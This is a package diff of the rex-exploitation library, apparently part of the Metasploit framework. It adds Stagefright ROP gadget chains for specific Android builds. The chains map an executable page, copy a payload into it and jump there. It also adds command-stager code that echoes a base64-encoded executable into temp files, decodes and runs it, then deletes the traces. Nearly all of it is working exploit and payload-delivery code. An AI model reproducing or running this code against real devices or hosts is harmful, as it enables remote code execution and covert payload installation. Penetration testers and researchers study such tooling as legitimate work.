rex-exploitation 0.1.0

data/data/ropdb/stagefright.xml

@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>lrx</target>
+	</compatibility>
+
+	<gadgets base="0xb66a0000">
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget offset="0x000042f9">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+		<gadget offset="0x001127b8">ptr to mmap64 (less 0x20)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="0xffffffff">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x00058e63">pop {r4, pc}</gadget>
+		<gadget offset="0x00110438">ptr to memcpy (less 0x20)</gadget>
+		<gadget offset="0x00061597">pop {r1, r2, r7, pc}</gadget>
+		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+		<gadget value="size">memcpy length (payload size)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget value="junk">value to be skipped (r5)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0002fed3">bx r0</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>lmy-1</target>
+	</compatibility>
+
+	<gadgets base="0xb66a0000">
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget offset="0x000bfdbf">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+		<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="0xffffffff">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0000f379">pop {r4, pc}</gadget>
+		<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
+		<gadget offset="0x000a1251">pop {r1, r2, r7, pc}</gadget>
+		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+		<gadget value="size">memcpy length (payload size)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget value="junk">value to be skipped (r5)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x000301a5">bx r0</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>lmy-2</target>
+	</compatibility>
+
+	<gadgets base="0xb66a0000">
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+		<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="0xffffffff">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0000f379">pop {r4, pc}</gadget>
+		<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
+		<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+		<gadget value="size">memcpy length (payload size)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget value="junk">value to be skipped (r5)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0000b3bd">bx r0</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>shamu / LYZ28E</target>
+	</compatibility>
+
+	<gadgets base="0xb66a0000">
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget offset="0x000bfe4f">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+		<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="0xffffffff">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x00044f71">pop {r4, pc}</gadget>
+		<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
+		<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+		<gadget value="size">memcpy length (payload size)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget value="junk">value to be skipped (r5)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0000f7cd">bx r0</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>shamu / LYZ28J</target>
+	</compatibility>
+
+	<gadgets base="0xb66a0000">
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+		<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="0xffffffff">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x00044f71">pop {r4, pc}</gadget>
+		<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
+		<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
+		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+		<gadget value="size">memcpy length (payload size)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget value="junk">value to be skipped (r5)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0000f83d">bx r0</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>sm-g900v / OE1</target>
+	</compatibility>
+
+	<gadgets base="0xb66a0000">
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget offset="0x00092b85">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
+		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
+		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
+		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
+		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
+		<gadget offset="0x0017af08">ptr to mmap64 (less 0x20)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="0xffffffff">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 fd</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x00065467">pop {r4, pc}</gadget>
+		<gadget offset="0x0017a6e4">ptr to memcpy (less 0x20)</gadget>
+		<gadget offset="0x0009f359">pop {r1, r2, r7, pc}</gadget>
+		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
+		<gadget value="size">memcpy length (payload size)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
+		<gadget value="junk">value to be skipped (r3)</gadget>
+		<gadget value="junk">value to be skipped (r4)</gadget>
+		<gadget value="junk">value to be skipped (r5)</gadget>
+		<gadget value="junk">value to be skipped (r6)</gadget>
+		<gadget value="junk">value to be skipped (r7)</gadget>
+		<gadget offset="0x0000c409">bx r0</gadget>
+	</gadgets>
+</rop>
+
+</db>

data/lib/rex/exploitation.rb

@@ -0,0 +1,7 @@
+require "rex/exploitation/version"
+
+module Rex
+  module Exploitation
+    DATA_DIR = File.expand_path(File.join(__FILE__, '..', '..', '..', 'data'))
+  end
+end

data/lib/rex/exploitation/cmdstager.rb

@@ -0,0 +1,11 @@
+# -*- coding: binary -*-
+
+require 'rex/exploitation/cmdstager/base'
+require 'rex/exploitation/cmdstager/vbs'
+require 'rex/exploitation/cmdstager/certutil'
+require 'rex/exploitation/cmdstager/debug_write'
+require 'rex/exploitation/cmdstager/debug_asm'
+require 'rex/exploitation/cmdstager/tftp'
+require 'rex/exploitation/cmdstager/bourne'
+require 'rex/exploitation/cmdstager/echo'
+require 'rex/exploitation/cmdstager/printf'

data/lib/rex/exploitation/cmdstager/base.rb

@@ -0,0 +1,189 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating cmdstagers.
+#
+###
+
+class CmdStagerBase
+
+  def initialize(exe)
+    @linemax     = 2047 # covers most likely cases
+    @exe         = exe
+  end
+
+  #
+  # Generates the cmd payload including the h2bv2 decoder and encoded payload.
+  # The resulting commands also perform cleanup, removing any left over files
+  #
+  def generate(opts = {})
+    # Allow temporary directory override
+    @tempdir = opts[:temp]
+    @tempdir ||= "%TEMP%\\"
+    if (@tempdir == '.')
+      @tempdir = ''
+    end
+
+    opts[:linemax] ||= @linemax
+
+    generate_cmds(opts)
+  end
+
+
+  #
+  # This does the work of actually building an array of commands that
+  # when executed will create and run an executable payload.
+  #
+  def generate_cmds(opts)
+
+    # Initialize an arry of commands to execute
+    cmds = []
+
+    # Add the exe building commands
+    cmds += generate_cmds_payload(opts)
+
+    # Add the decoder script building commands
+    cmds += generate_cmds_decoder(opts)
+
+    compress_commands(cmds, opts)
+  end
+
+
+  #
+  # Generate the commands to create an encoded version of the
+  # payload file
+  #
+  def generate_cmds_payload(opts)
+
+    # First encode the payload
+    encoded = encode_payload(opts)
+
+    # Now split it up into usable pieces
+    parts = slice_up_payload(encoded, opts)
+
+    # Turn each part into a valid command
+    parts_to_commands(parts, opts)
+  end
+
+  #
+  # This method is intended to be override by the child class
+  #
+  def encode_payload(opts)
+    # Defaults to nothing
+    ""
+  end
+
+  #
+  # We take a string of data and turn it into an array of parts.
+  #
+  # We save opts[:extra] bytes out of every opts[:linemax] for the parts
+  # appended and prepended to the resulting elements.
+  #
+  def slice_up_payload(encoded, opts)
+    tmp = encoded.dup
+
+    parts = []
+    xtra_len = opts[:extra]
+    xtra_len ||= 0
+    while (tmp.length > 0)
+      parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
+    end
+
+    parts
+  end
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it -- example "echo " and " >>file"
+  #
+  def parts_to_commands(parts, opts)
+    # Return as-is
+    parts
+  end
+
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+    # Defaults to no commands.
+    []
+  end
+
+
+
+  #
+  # Compress commands into as few lines as possible. Minimizes the number of
+  # commands to execute while maximizing the number of commands per execution.
+  #
+  def compress_commands(cmds, opts)
+    new_cmds = []
+    line = ''
+
+    concat = opts[:concat_operator] || cmd_concat_operator
+
+    # We cannot compress commands if there is no way to combine commands on
+    # a single line.
+    return cmds unless concat
+
+    cmds.each { |cmd|
+
+      # If this command will fit, concat it and move on.
+      if ((line.length + cmd.length + concat.length) < opts[:linemax])
+        line << concat if line.length > 0
+        line << cmd
+        next
+      end
+
+      # The command wont fit concat'd to this line, if we have something,
+      # we have to add it to the array now.
+      if (line.length > 0)
+        new_cmds << line
+        line = ''
+      end
+
+      # If it won't fit even after emptying the current line, error out..
+      if (cmd.length > opts[:linemax])
+        raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
+      end
+
+      # It will indeed fit by itself, lets add it.
+      line << cmd
+
+    }
+    new_cmds << line if (line.length > 0)
+
+    # Return the final array.
+    new_cmds
+  end
+
+  #
+  # Can be overriden.  For exmaple, use for unix use ";" instead
+  #
+  def cmd_concat_operator
+    nil
+  end
+
+  # Should be overriden if the cmd stager needs to setup anything
+  # before it's executed
+  def setup(mod = nil)
+
+  end
+
+  #
+  # Should be overriden if the cmd stager needs to do any clenaup
+  #
+  def teardown(mod = nil)
+
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/bourne.rb

@@ -0,0 +1,118 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+class CmdStagerBourne < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_encoded = Rex::Text.rand_text_alpha(5) + '.b64'
+    @var_decoded = Rex::Text.rand_text_alpha(5)
+  end
+
+  def generate(opts = {})
+    opts[:temp] = opts[:temp] || '/tmp/'
+    opts[:temp] = opts[:temp].empty?? opts[:temp] : opts[:temp] + '/'
+    opts[:temp] = opts[:temp].gsub(/\/{2,}/, '/')
+    opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
+    opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
+    if (opts[:file])
+        @var_encoded = opts[:file] + '.b64'
+        @var_decoded = opts[:file]
+    end
+    super
+  end
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo -n "
+    @cmd_end   = ">>'#{@tempdir}#{@var_encoded}'"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple base64...
+  #
+  def encode_payload(opts)
+    Rex::Text.encode_base64(@exe)
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+    decoders = [
+      "base64 --decode -",
+      "openssl enc -d -A -base64 -in /dev/stdin",
+      "python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
+      "perl -MMIME::Base64 -ne 'print decode_base64($_)'"
+    ]
+    decoder_cmd = []
+    decoders.each do |cmd|
+      binary = cmd.split(' ')[0]
+      decoder_cmd << "(which #{binary} >&2 && #{cmd})"
+    end
+    decoder_cmd = decoder_cmd.join(" || ")
+    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > '#{@tempdir}#{@var_decoded}' < '#{@tempdir}#{@var_encoded}'"
+    [ decoder_cmd ]
+  end
+
+  def compress_commands(cmds, opts)
+    # Make it all happen
+    cmds << "chmod +x '#{@tempdir}#{@var_decoded}'"
+    # Background the process, allowing the cleanup code to continue and delete the data
+    # while allowing the original shell to continue to function since it isn't waiting
+    # on the payload to exit.  The 'sleep' is required as '&' is a command terminator
+    # and having & and the cmds delimiter ';' next to each other is invalid.
+    if opts[:background]
+      cmds << "'#{@tempdir}#{@var_decoded}' & sleep 2"
+    else
+      cmds << "'#{@tempdir}#{@var_decoded}'"
+    end
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "rm -f '#{@tempdir}#{@var_decoded}'"
+      cmds << "rm -f '#{@tempdir}#{@var_encoded}'"
+    end
+
+    super
+  end
+
+  def cmd_concat_operator
+    " ; "
+  end
+
+end
+end
+end